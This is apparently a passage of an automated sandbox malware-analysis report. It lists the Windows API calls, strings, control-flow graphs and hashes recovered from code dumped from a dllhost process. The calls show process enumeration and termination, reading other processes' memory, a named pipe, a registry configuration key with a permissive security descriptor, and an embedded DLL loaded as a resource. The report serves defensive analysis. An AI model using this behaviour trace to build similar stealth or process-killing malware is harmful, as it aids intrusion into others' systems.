• API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
• String ID: M$\\.\pipe\$sxrchildproc34226543a32
• API String ID: 2203880229-931012095
• Opcode ID: 8bbcbc9c30bf249403b67e5192530c3daad7030c3e3b146d5d97f71634417a3f
• Instruction ID: 5dace2141bef9c3b5cd1cb720ea8b1ec6a8901c3fd299cecde42825f938ecfee
• Opcode Fuzzy Hash: 8bbcbc9c30bf249403b67e5192530c3daad7030c3e3b146d5d97f71634417a3f
• Instruction Fuzzy Hash: A1012C30541114BBE710ABA09E0DFEE7B6CAF04702F0040B6F621F51D5DBB85B4586AA
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 192 401a9b-401ab6 OpenProcessToken 193 401ab8-401acb GetTokenInformation 192->193 194 401b2e-401b32 192->194 195 401b25-401b28 CloseHandle 193->195 196 401acd-401ad6 GetLastError 193->196 195->194 196->195 197 401ad8-401ae7 LocalAlloc 196->197 198 401b24 197->198 199 401ae9-401afe GetTokenInformation 197->199 198->195 200 401b00-401b1b GetSidSubAuthorityCount GetSidSubAuthority 199->200 201 401b1d-401b1e LocalFree 199->201 200->201 201->198
APIs
• OpenProcessToken.ADVAPI32(00000000,00000008,?,?), ref: 00401AAE
• GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00401AC3
• GetLastError.KERNEL32 ref: 00401ACD
• LocalAlloc.KERNEL32(00000000,?,00000000), ref: 00401ADD
• GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00401AF6
• GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00401B02
• GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00401B0F
• LocalFree.KERNEL32(00000000), ref: 00401B1E
• CloseHandle.KERNEL32(?), ref: 00401B28
Memory Dump Source
• Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: Token$AuthorityInformationLocal$AllocCloseCountErrorFreeHandleLastOpenProcess
• String ID:
• API String ID: 134889411-0
• Opcode ID: 3f6903201eff1ad7ec3e2dd7b63a750a26bf1666cece8edcd273cf13e87f80dd
• Instruction ID: 9164ece030e66e8021fde0b930ee6f0da4f620963b5e28a9a42e3cf50d94b084
• Opcode Fuzzy Hash: 3f6903201eff1ad7ec3e2dd7b63a750a26bf1666cece8edcd273cf13e87f80dd
• Instruction Fuzzy Hash: 1F11E635A01208FFDB219F65DD08EAE7FBDEB45702B004065F941F6164D7349A05DA64
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 212 4018a7-4018dd GetProcessHeap HeapAlloc call 4016fd 215 40192e-401940 GetProcessHeap HeapFree 212->215 216 4018df-4018e5 212->216 217 4018e7-4018ea 216->217 218 40192d 216->218 219 4018ed-4018f6 217->219 218->215 220 401921-401927 219->220 221 4018f8-4018fa 219->221 220->219 223 401929-40192c 220->223 221->220 222 4018fc-40190d OpenProcess 221->222 222->220 224 40190f-40191b TerminateProcess CloseHandle 222->224 223->218 224->220
APIs
• GetProcessHeap.KERNEL32(00000000,00003E80,00000000), ref: 004018B8
• HeapAlloc.KERNEL32(00000000), ref: 004018BF
  • Part of subcall function 004016FD: GetProcessHeap.KERNEL32(00000000,00009C40,74DF2E90,00000000,00000000), ref: 00401720
  • Part of subcall function 004016FD: HeapAlloc.KERNEL32(00000000), ref: 0040172D
  • Part of subcall function 004016FD: GetProcessHeap.KERNEL32(00000000,00009C40), ref: 0040173B
  • Part of subcall function 004016FD: HeapAlloc.KERNEL32(00000000), ref: 00401742
  • Part of subcall function 004016FD: K32EnumProcesses.KERNEL32(004018DB,00009C40,?), ref: 00401757
  • Part of subcall function 004016FD: OpenProcess.KERNEL32(00000410,00000000,004018DB), ref: 00401786
  • Part of subcall function 004016FD: K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?), ref: 004017A3
  • Part of subcall function 004016FD: ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000), ref: 004017D9
  • Part of subcall function 004016FD: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401867
  • Part of subcall function 004016FD: GetProcessHeap.KERNEL32(00000000,004018DB), ref: 0040187B
  • Part of subcall function 004016FD: HeapFree.KERNEL32(00000000), ref: 00401888
• OpenProcess.KERNEL32(00000001,00000000,00000000,74DF2E90,00000000), ref: 00401902
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00401912
• CloseHandle.KERNEL32(?), ref: 0040191B
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401931
• HeapFree.KERNEL32(00000000), ref: 00401938
Memory Dump Source
• Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: HeapProcess$Alloc$CloseEnumFreeOpen$ChangeFindHandleMemoryModulesNotificationProcessesReadTerminate
• String ID:
• API String ID: 1088988999-0
• Opcode ID: 6b1c4ebb3777feb8a05adef8be37bc18a57d842e180a3acae5b33e55d23f7326
• Instruction ID: fb9a27978f6a034ac965e41c8b7e99190f8b99f20516355282bac86f31688869
• Opcode Fuzzy Hash: 6b1c4ebb3777feb8a05adef8be37bc18a57d842e180a3acae5b33e55d23f7326
• Instruction Fuzzy Hash: 3F112AB1E01304BBDB10AFE59D88B4EBBBCEB08712F108476E505B32E5D7759A44CB68
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 225 401557-40157f RegCreateKeyExW 226 401581-40159e ConvertStringSecurityDescriptorToSecurityDescriptorW 225->226 227 4015bb 225->227 228 4015a0-4015b0 RegSetKeySecurity LocalFree 226->228 229 4015b6-4015b9 226->229 230 4015bd-4015c0 227->230 228->229 229->230
APIs
• RegCreateKeyExW.KERNELBASE(80000002,SOFTWARE\$sxrconfig,00000000,00000000,00000000,000F013F,00000000,?,00000000,74DF2E90,00000000,?,?,?,00401FE7), ref: 00401577
• ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA),00000001,?,?), ref: 00401596
• RegSetKeySecurity.KERNELBASE(?,00000004,?,?,00401FE7), ref: 004015A7
• LocalFree.KERNEL32(?,?,00401FE7), ref: 004015B0
Strings
• SOFTWARE\$sxrconfig, xrefs: 0040156D
• D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00401591
Memory Dump Source
• Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: Security$Descriptor$ConvertCreateFreeLocalString
• String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE\$sxrconfig
• API String ID: 200925960-2289364234
• Opcode ID: c692efe74f0057505f4a1857620f9dc869b443ba960f10c4b16b43229a36ce3f
• Instruction ID: e221c2813855d26ddeeea765a6059013b2d6337bb14bfc1399376ef4206ac4e7
• Opcode Fuzzy Hash: c692efe74f0057505f4a1857620f9dc869b443ba960f10c4b16b43229a36ce3f
• Instruction Fuzzy Hash: B7F04F71A01144FAEB208F93DD4DE9BBEBCEBC9B52F10007AB506F51A0D6B19B00D634
Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 231 402144-40217c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 232 40217f-402191 K32EnumProcesses 231->232 233 4021e0-4021eb Sleep 232->233 234 402193-4021a0 232->234 233->232 235 4021a2-4021a6 234->235 236 4021cd-4021df call 401941 234->236 237 4021a8 235->237 238 4021bb-4021c1 call 402129 235->238 236->233 240 4021ab-4021b4 237->240 244 4021c4-4021c7 238->244 242 4021b6-4021b9 240->242 243 4021c8-4021cb 240->243 242->238 242->240 243->235 243->236 244->243
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40), ref: 0040215A
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00402163
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00009C40), ref: 00402171
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00402174
                                                                                                                      • K32EnumProcesses.KERNEL32(00000000,00009C40,00000000), ref: 00402189
                                                                                                                      • Sleep.KERNEL32(?), ref: 004021E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3676546796-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow graph (rendering not reproduced): blocks 401a24-401a7b; subcall to 4019fa, then OpenProcess, IsWow64Process and FindCloseChangeNotification
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004019FA: GetCurrentProcess.KERNEL32(?,ntdll.dll,ntdll.dll,?,00401DEC), ref: 00401A08
                                                                                                                        • Part of subcall function 004019FA: IsWow64Process.KERNEL32(00000000,?,00401DEC), ref: 00401A0F
                                                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?,?,?,00000000,?,?,004015E7), ref: 00401A41
                                                                                                                      • IsWow64Process.KERNEL32(00000000,?,?,004015E7), ref: 00401A52
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,004015E7), ref: 00401A68
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Wow64$ChangeCloseCurrentFindNotificationOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4129136839-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow graph (rendering not reproduced): blocks 401f4d-401f53; subcall to 401f5a followed by ExitProcess
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401F5A: FindResourceA.KERNEL32(00000000,00000065,DLL), ref: 00401F8F
                                                                                                                        • Part of subcall function 00401F5A: SizeofResource.KERNEL32(00000000,00000000), ref: 00401FA1
                                                                                                                        • Part of subcall function 00401F5A: LoadResource.KERNEL32(00000000,00000000), ref: 00401FB6
                                                                                                                        • Part of subcall function 00401F5A: LockResource.KERNEL32(00000000), ref: 00401FC5
                                                                                                                        • Part of subcall function 00401F5A: GetCurrentProcessId.KERNEL32 ref: 00401FD6
                                                                                                                        • Part of subcall function 00401F5A: RegCreateKeyExW.KERNELBASE(?,pid,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 00402001
                                                                                                                        • Part of subcall function 00401F5A: GetCurrentProcessId.KERNEL32 ref: 00402011
                                                                                                                        • Part of subcall function 00401F5A: RegSetValueExW.KERNELBASE(?,svc32,00000000,00000004,?,00000004), ref: 00402027
                                                                                                                        • Part of subcall function 00401F5A: RegCloseKey.KERNELBASE(?), ref: 00402030
                                                                                                                        • Part of subcall function 00401F5A: RegCloseKey.ADVAPI32(?), ref: 00402035
                                                                                                                        • Part of subcall function 00401F5A: CreateThread.KERNELBASE(00000000,00000000,004021ED,0040210E,00000000,00000000), ref: 0040204B
                                                                                                                        • Part of subcall function 00401F5A: GetProcessHeap.KERNEL32(00000000,00000008), ref: 00402056
                                                                                                                        • Part of subcall function 00401F5A: HeapAlloc.KERNEL32(00000000), ref: 00402059
                                                                                                                        • Part of subcall function 00401F5A: CreateThread.KERNELBASE(00000000,00000000,00402144,00000000,00000000,00000000), ref: 00402078
                                                                                                                      • ExitProcess.KERNEL32 ref: 00401F53
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessResource$Create$CloseCurrentHeapThread$AllocExitFindLoadLockSizeofValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 174967751-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,004014CA,00000000,00000000,00000000,00000000,75A8EB20,75A8E9B0), ref: 004011BE
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,0000020A,00000000), ref: 004011D3
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004011DA
                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00000064,00000000,?,00000000,?), ref: 00401213
                                                                                                                      • StrCmpIW.SHLWAPI(?,00000000), ref: 0040123E
                                                                                                                      • StrCmpW.SHLWAPI ref: 00401246
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401276
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0040127D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00401546,00000000,00000000,00000000,00000000,75A8EB20,00000000,75A8E9B0), ref: 0040105A
                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00000064,00000000,?,?,?), ref: 0040109A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00402119), ref: 004010D8
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004010DF
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00401101
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00401108
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00402119,00000000,?,00000000,?,?,00401269), ref: 00401303
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00401269), ref: 0040130A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00401269), ref: 00401329
                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00401269), ref: 00401330
                                                                                                                      • lstrlenW.KERNEL32(00000000,00000000,?,00000000,?,?,00401269), ref: 0040133A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00401269), ref: 0040134A
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00401269), ref: 00401351
                                                                                                                      • StrCpyW.SHLWAPI ref: 0040136C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Alloc$Freelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 323503520-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,74DEF380,004020AE), ref: 004012A1
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 004012A8
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,74DEF380,004020AE), ref: 004012B4
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 004012BB
                                                                                                                      • GetProcessHeap.KERNEL32(00000000), ref: 004012CA
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 004012D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3859560861-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 004019D6
                                                                                                                      • VerSetConditionMask.NTDLL(00000000), ref: 004019DA
                                                                                                                      • VerSetConditionMask.NTDLL(00000000), ref: 004019DE
                                                                                                                      • VerifyVersionInfoW.KERNEL32 ref: 004019EB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2793162063-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(?,ntdll.dll,ntdll.dll,?,00401DEC), ref: 00401A08
                                                                                                                      • IsWow64Process.KERNEL32(00000000,?,00401DEC), ref: 00401A0F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentWow64
                                                                                                                      • String ID: ntdll.dll
                                                                                                                      • API String ID: 1905925150-2227199552
                                                                                                                      • Opcode ID: 03295c593a5503e2dde2a986b3379b6811fbb451b98e02955a8ef8d2f1d28dfd
                                                                                                                      • Instruction ID: 06259989cea86e0b061d28083f79a8307f71ba07c1a95a57cc55de1362444462
                                                                                                                      • Opcode Fuzzy Hash: 03295c593a5503e2dde2a986b3379b6811fbb451b98e02955a8ef8d2f1d28dfd
                                                                                                                      • Instruction Fuzzy Hash: CFD01271A02224FFCA109B95AD0898FBBACEA44B417104066A501F2154D674DF04DAE4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000010,00000000,00401399,?,?,?,?,?,0040207F), ref: 00401163
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040116A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,?,0040207F), ref: 00401187
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040118E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1617791916-0
                                                                                                                      • Opcode ID: 885a11a9880dcc0c819abbe253fd760aedac661f3a7600194844b7c3d13ba120
                                                                                                                      • Instruction ID: 4b654fa5435c37f94ce0262a310420d91d61308a5e9fd9e293b9bf8f3483adb4
                                                                                                                      • Opcode Fuzzy Hash: 885a11a9880dcc0c819abbe253fd760aedac661f3a7600194844b7c3d13ba120
                                                                                                                      • Instruction Fuzzy Hash: 4EE0B6B1741701AFE3005F66ED0DB05BEA8BB84713F008525F209A6294C7F9A150CB68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,0000000C,00000000,004013A0,?,?,?,?,?,0040207F), ref: 00401005
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040100C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,?,0040207F), ref: 00401022
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 00401029
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1617791916-0
                                                                                                                      • Opcode ID: 9ab1f129f06e7e311e7c1b3ccb71ffef87ef0444cbad93c226a97160af2f3025
                                                                                                                      • Instruction ID: 3655e1e9d02de74c639ba0de4372b024f1e7c357000c5007300e266bd1ea0d1f
                                                                                                                      • Opcode Fuzzy Hash: 9ab1f129f06e7e311e7c1b3ccb71ffef87ef0444cbad93c226a97160af2f3025
                                                                                                                      • Instruction Fuzzy Hash: A8E0E2B1741301AFE7405FA6ED0DB067EA8BB84713F008521F206E6298C7B49100CB28
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,74DEF380,004020B6), ref: 00401135
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0040113C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0040114F
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00401156
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3859560861-0
                                                                                                                      • Opcode ID: d1c54a0f835e7ba13855c51fd6259624f5865ec1ca741ca66227df171c51b8af
                                                                                                                      • Instruction ID: 2693185da4d0c2e810f24c4556aaef60f99b1188b93b94b34d5ef21fdf38a5ee
                                                                                                                      • Opcode Fuzzy Hash: d1c54a0f835e7ba13855c51fd6259624f5865ec1ca741ca66227df171c51b8af
                                                                                                                      • Instruction Fuzzy Hash: 09D067B2341200EFEA042FE0AD8EB593A5CAB48B13F008425F20AA90A5CAB599448738
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%